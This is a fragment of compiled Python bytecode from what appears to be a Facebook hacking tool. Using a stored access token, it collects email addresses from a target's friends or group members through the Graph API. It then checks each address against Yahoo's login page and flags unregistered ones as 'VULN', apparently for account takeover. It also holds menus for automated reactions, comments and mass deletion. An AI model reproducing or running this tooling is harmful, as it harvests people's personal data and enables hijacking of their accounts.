\x00|\r\x00d!\x00\x17\x83\x01\x00\x01d"\x00|\r\x00\x17d#\x00\x17|\n\x00\x17GHt!\x00j\x15\x00|\r\x00\x83\x01\x00\x01q\xd1\x02n\x00\x00Wq{\x01\x04t\x12\x00k\n\x00r\xe5\x02\x01\x01\x01q{\x01Xq{\x01Wd\x15\x00d\x16\x00\x14GHd$\x00GHd%\x00t"\x00t#\x00t!\x00\x83\x01\x00\x83\x01\x00\x17GHd&\x00GH|\x07\x00j$\x00\x83\x00\x00\x01t\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S(\'\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s8\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email from friend \x1b[1;97m...s\x16\x00\x00\x00/friends?access_token=s\x16\x00\x00\x00out/FriendMailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msC\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/FriendMailVuln.txt(%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\xb0\x00\x00\x00R \x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x12\x00\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x07\x01\x00\x00R\x08\x01\x00\x00R\t\x01\x00\x00R\x11\x00\x00\x00Rj\x00\x00\x00Rq\x00\x00\x00R\n\x01\x00\x00R\x1e\x00\x00\x00R\x0b\x01\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xff\x00\x00\x00Q\x06\x00\x00s\x84\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x12\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s1\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00}\x02\x00y>\x00t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x03\x00t\x0f\x00j\x10\x00|\x03\x00j\x11\x00\x83\x01\x00}\x04\x00d\x0c\x00|\x04\x00d\r\x00\x19\x17GHWn\'\x00\x04t\x12\x00k\n\x00r\x16\x01\x01\x01\x01d\x0e\x00GHt\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xt\x14\x00d\x10\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\x11\x00|\x02\x00\x17d\x12\x00\x17t\x04\x00\x17\x83\x01\x00}\x05\x00t\x0f\x00j\x10\x00|\x05\x00j\x11\x00\x83\x01\x00}\x06\x00t\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x07\x00t\x14\x00d\x15\x00\x83\x01\x00\x01d\x16\x00d\x17\x00\x14GHxw\x01|\x06\x00d\x18\x00\x19D]k\x01}\x08\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x15\x00|\x01\x00\x83\x01\x00\x01|\x08\x00d\x19\x00\x19}\x02\x00|\x08\x00d\r\x00\x19}\t\x00t\r\x00j\x0e\x00d\x11\x00|\x02\x00\x17d\x1a\x00\x17t\x04\x00\x17\x83\x01\x00}\n\x00t\x0f\x00j\x10\x00|\n\x00j\x11\x00\x83\x01\x00}\x0b\x00y\xf9\x00|\x0b\x00d\x1b\x00\x19}\x0c\x00t\x16\x00j\x17\x00d\x1c\x00\x83\x01\x00}\r\x00|\r\x00j\x18\x00|\x0c\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x0e\x00d\x1d\x00|\x0e\x00k\x06\x00r\xd1\x02t\x1a\x00j\x02\x00d\x1e\x00\x83\x01\x00\x01t\x1b\x00t\x1a\x00j\x1c\x00_\x1d\x00t\x1a\x00j\x1e\x00d\x1f\x00d\x08\x00\x83\x00\x01\x01|\x0c\x00t\x1a\x00d \x00<t\x1a\x00j\x1f\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\x0f\x00t\x16\x00j\x17\x00d!\x00\x83\x01\x00}\x10\x00y\x19\x00|\x10\x00j\x18\x00|\x0f\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x11\x00Wn\n\x00\x01\x01\x01w{\x01n\x01\x00Xd"\x00|\x11\x00k\x06\x00r\xd1\x02|\x07\x00j \x00|\x0c\x00d#\x00\x17\x83\x01\x00\x01d$\x00|\x0c\x00\x17d%\x00\x17|\t\x00\x17GHt!\x00j\x15\x00|\x0c\x00\x83\x01\x00\x01q\xd1\x02n\x00\x00Wq{\x01\x04t\x12\x00k\n\x00r\xe5\x02\x01\x01\x01q{\x01Xq{\x01Wd\x16\x00d\x17\x00\x14GHd&\x00GHd\'\x00t"\x00t#\x00t!\x00\x83\x01\x00\x83\x01\x00\x17GHd(\x00GH|\x07\x00j$\x00\x83\x00\x00\x01t\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S()\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s7\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email from group \x1b[1;97m...s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=s\x14\x00\x00\x00out/GrupMailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msA\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/GrupMailVuln.txt(%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\xb0\x00\x00\x00R \x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x12\x00\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x07\x01\x00\x00R\x08\x01\x00\x00R\t\x01\x00\x00R\x11\x00\x00\x00Rq\x00\x00\x00R\n\x01\x00\x00R\x1e\x00\x00\x00R\x0b\x01\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x9d\x00\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x00\x01\x00\x00\x97\x06\x00\x00s\x84\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x93\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHt\x0c\x00d\x08\x00\x83\x01\x00}\x00\x00y\x1f\x00t\x02\x00|\x00\x00d\x03\x00\x83\x02\x00}\x01\x00|\x01\x00j\r\x00\x83\x00\x00}\x02\x00Wn\'\x00\x04t\x05\x00k\n\x00r\xeb\x00\x01\x01\x01d\t\x00GHt\x0c\x00d\n\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xg\x00\x00}\x03\x00d\x0b\x00}\x04\x00t\x0f\x00d\x0c\x00\x83\x01\x00\x01t\x02\x00d\r\x00d\x0e\x00\x83\x02\x00}\x05\x00d\x0f\x00d\x10\x00\x14GHt\x02\x00|\x00\x00d\x03\x00\x83\x02\x00j\r\x00\x83\x00\x00}\x02\x00x\x1a\x01|\x02\x00D]\x12\x01}\x06\x00|\x06\x00j\x10\x00d\x11\x00d\x12\x00\x83\x02\x00}\x02\x00|\x04\x00d\x06\x007}\x04\x00|\x03\x00j\x11\x00|\x04\x00\x83\x01\x00\x01t\x12\x00j\x13\x00d\x13\x00\x83\x01\x00}\x07\x00|\x07\x00j\x14\x00|\x02\x00\x83\x01\x00j\x15\x00\x83\x00\x00}\x08\x00d\x14\x00|\x08\x00k\x06\x00r6\x01t\x16\x00j\x02\x00d\x15\x00\x83\x01\x00\x01t\x17\x00t\x16\x00j\x18\x00_\x19\x00t\x16\x00j\x1a\x00d\x16\x00d\x0b\x00\x83\x00\x01\x01|\x02\x00t\x16\x00d\x17\x00<t\x16\x00j\x1b\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\t\x00t\x12\x00j\x13\x00d\x18\x00\x83\x01\x00}\n\x00y\x19\x00|\n\x00j\x14\x00|\t\x00\x83\x01\x00j\x15\x00\x83\x00\x00}\x0b\x00Wn\n\x00\x01\x01\x01q6\x01n\x01\x00Xd\x19\x00|\x0b\x00k\x06\x00rH\x02|\x05\x00j\x1c\x00|\x02\x00d\x11\x00\x17\x83\x01\x00\x01d\x1a\x00|\x02\x00\x17GHt\x1d\x00j\x11\x00|\x02\x00\x83\x01\x00\x01qH\x02q6\x01q6\x01Wd\x0f\x00d\x10\x00\x14GHd\x1b\x00GHd\x1c\x00t\x1e\x00t\x1f\x00t\x1d\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1d\x00GH|\x05\x00j \x00\x83\x00\x00\x01t\x0c\x00d\n\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01d\x00\x00S(\x1e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile path \x1b[1;91m: \x1b[1;97ms\x19\x00\x00\x00\x1b[1;91m[!] File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]i\x00\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x14\x00\x00\x00out/FileMailVuln.txtR\x11\x00\x00\x00i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x01\x00\x00\x00\nR\n\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msA\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/FileMailVuln.txt(!\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xf2\x00\x00\x00R\xb0\x00\x00\x00R \x00\x00\x00R\x16\x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x0c\x00\x00\x00t\x05\x00\x00\x00filesR\xf4\x00\x00\x00R\x0b\x01\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00R\t\x01\x00\x00R\xf6\x00\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x9d\x00\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x01\x01\x00\x00\xdd\x06\x00\x00sp\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x0c\x01\x03\x01\x0f\x01\x10\x01\r\x01\x05\x01\n\x01\x0b\x01\x06\x01\x06\x01\n\x01\x0f\x01\t\x01\x15\x01\r\x01\x12\x01\n\x01\r\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\t\x01\x17\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xaa\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Bot Reactions Target Posts=\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Bot Reactions Grup Posts;\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Bot Komen Target Posts9\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Bot Komen Grup Posts6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Mass delete Posts8\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6.\x1b[1;97m Mass accept friends8\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m7.\x1b[1;97m Mass delete friends*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\t\x00\x00\x00bot_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00menu_bot\x1c\x07\x00\x00s(\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xe7\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xbc\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xa6\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01nN\x00|\x00\x00d\t\x00k\x02\x00r\xab\x00t\x07\x00\x83\x00\x00\x01n8\x00|\x00\x00d\n\x00k\x02\x00r\xc1\x00t\x08\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0b\x00k\x02\x00r\xd7\x00t\t\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R\x82\x00\x00\x00R\x83\x00\x00\x00R:\x00\x00\x00(\n\x00\x00\x00R/\x00\x00\x00R\x10\x01\x00\x00t\n\x00\x00\x00menu_reactt\n\x00\x00\x00grup_reactt\t\x00\x00\x00bot_koment\n\x00\x00\x00grup_koment\n\x00\x00\x00deletepostt\x06\x00\x00\x00acceptt\x08\x00\x00\x00unfriendR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00bots(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x10\x01\x00\x002\x07\x00\x00s,\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1. \x1b[1;97mLikes*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2. \x1b[1;97mLoves)\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3. \x1b[1;97mWows*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4. \x1b[1;97mHahas,\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5. \x1b[1;97mSadBoys+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6. \x1b[1;97mAngrys*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00react_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x12\x01\x00\x00L\x07\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xf5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xca\x00|\x00\x00d\x04\x00k\x02\x00rC\x00d\x05\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\xae\x00|\x00\x00d\x06\x00k\x02\x00r_\x00d\x07\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\x92\x00|\x00\x00d\x08\x00k\x02\x00r{\x00d\t\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nv\x00|\x00\x00d